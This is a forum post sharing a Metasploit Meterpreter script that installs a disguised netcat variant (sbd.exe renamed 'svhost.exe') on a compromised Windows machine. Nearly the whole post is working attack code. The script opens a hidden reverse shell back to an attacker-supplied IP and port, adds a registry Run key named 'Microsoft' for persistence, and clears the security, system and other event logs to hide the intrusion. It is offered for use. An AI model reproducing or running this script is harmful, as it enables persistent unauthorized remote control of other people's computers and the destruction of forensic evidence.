Gonzalez Posted January 27, 2010 Report Share Posted January 27, 2010 sbd.rb uploads sbd.exe runs as svchost.exe with the settings that are entered ny attackerit autoruns via registry & autostarts as the script is run then clears system logs remeber it is a modded netcat for a reverse shell needs some more edits to script to hide the reg a little better but this will do till update timesession = clienthost,port = session.tunnel_peer.split(':')#Menu-Options@@exec_opts = Rex::Parser::Arguments.new( "-r" => [ true, "Resporn time limit." ], "-p" => [ true, "Port Number to open." ], "-k" => [ true, "Authentication name."], "-h" => [ true, "Local ip address."]) def usage print_line("Sbd Configuration Meterpreter Script by Intern0t.net") print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ") print_line("####################################################") print(@@exec_opts.usage) raise Rex::Script::Completedend#Files to upload to target hostncexe = File.join(Msf::Config.install_root, "data", "sbd.exe")#Function to upload filesdef upload(session,file) location = session.fs.file.expand_path("%SystemRoot%\\system32") fileontrgt = "#{location}\\#{"svhost"}.exe" print_status("Uploading #{file}....") session.fs.file.upload_file("#{fileontrgt}","#{file}") print_status("#{file} Uploaded!") return fileontrgtend#Function to execute sbddef sbdrun(session,time,auth,port,ip) location = session.fs.file.expand_path("%SystemRoot%\\system32") session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false}) print_status("Local Ip Sbd Will Connect Back On: #{ip}") print_status("Local Port Sbd Will Connect Back On: #{port}") print_status("Pass Phrase: #{auth}") print_status("Respawn Time: #{time}")end#Fuction to add registry for sbddef regadd(session,time,auth,port,ip) location = session.fs.file.expand_path("%SystemRoot%\\system32") print_status("Adding to Registry ...") session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false}) print_status("Successfully added to Registry ...")enddef clrevtlgs(session) evtlogs = [ 'security', 'system', 'application', 'directory service', 'dns server', 'file replication service' ] begin evtlogs.each do |evl| log = session.sys.eventlog.open(evl) log.clear end rescue ::Exception => e print_status("Error clearing Event Log: #{e.class} #{e}") endend#Menu-Imputtime = nilport = nilip = nilauth = nil@@exec_opts.parse(args) { |opt, idx, val| case opt when "-r" time = val when "-p" port = val when "-h" ip = val when "-k" auth = val end}if portupload(session,ncexe)sbdrun(session,time,auth,port,ip)regadd(session,time,auth,port,ip)clrevtlgs(session)else usageendVideo:http://www.youtube.com/watch?v=imFAm3AxOuc Quote Link to comment Share on other sites More sharing options...